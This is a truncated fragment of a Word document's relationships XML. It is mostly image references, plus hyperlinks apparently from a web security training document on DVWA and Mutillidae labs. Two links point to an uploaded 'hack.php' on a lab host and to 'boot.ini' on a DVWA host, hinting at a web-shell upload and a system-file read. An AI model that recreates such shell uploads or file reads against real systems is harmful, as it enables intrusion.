Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Main_Page" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.png"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image276.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image301.jpeg"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.180.184.30/mutillidae/index.php?page=register.php&#27880;&#20876;1" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image247.png"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image287.jpeg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image312.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/phpmyadmin" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.153.130/dvwa/hackable/uploads/hack.php" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.png"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image256.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/14787628821104.png" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161223/14824826941488.png" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image298.jpeg"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.com/files/30564/whisker-2.1.tar.gz.html" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image323.jpeg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161009/1476000296331.png" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/mutillidae/" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image267.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.jpeg"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image334.jpeg"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797984749369.png" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image278.png"/><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50.png"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image289.jpeg"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image303.jpeg"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image207.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161124/14799581497051.png" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpeg"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image249.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="HTTPS://IP:8834" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image314.jpeg"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/1478762911998.png" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.png"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image258.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161223/14824827265355.png" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161106/1478422166374.png" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.jpeg"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image269.png"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image325.jpeg"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.jpeg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/mutillidae/" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image280.png"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.png"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image240.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797985121733.png" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://struts.apache.org/docs/s2-053.html" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image251.png"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image305.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apachefriends.org/download.html" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image291.jpeg"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image209.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161124/14799581792824.png" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image260.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image316.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/whatday/article/details/60955403" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpeg"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freebuf.com/articles/web/118352.html" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image231.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image271.png"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image327.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/phpinfo.php" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797985443503.png" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image242.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image282.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161031/14778954786668.png" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161124/14799582098311.png" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.180.187.10/DVWA-1.9/boot.ini" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image293.jpeg"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image307.png"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/14787631004643.png" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://yourip/mutillidae/index.php" TargetMode="External"/><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4.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image243.png"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image262.png"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image283.png"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image318.jpeg"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lib.csdn.net/base/softwaretest" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image329.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/whatday/article/details/60955403" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.emf"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/14787625541269.png" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161108/14785912161713.png" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image252.png"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image273.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image294.jpeg"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image308.jpeg"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image319.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61.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161031/14778955097586.png" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161106/14784220802790.png" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image244.png"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image263.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797985937424.png" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image284.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161009/14760002264830.jpg" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.jpeg"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xxx.xxx.xxx/abc.asp?p=YY" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image309.jpeg"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image330.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161031/14778952387559.png" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161108/1478591344486.png" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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21.jpeg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797984067767.png" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161223/14824823248355.png" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image274.png"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image295.jpe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6.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.png"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image299.jpeg"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image320.jpeg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image245.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/14787631292942.png" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image264.png"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image285.jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baidu.com/" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.python.org/" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image310.jpeg"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image331.jpeg"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161108/1478591243183.png" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/zh-cn/download/details.aspx?id=48145" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/14787628337241.png" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship 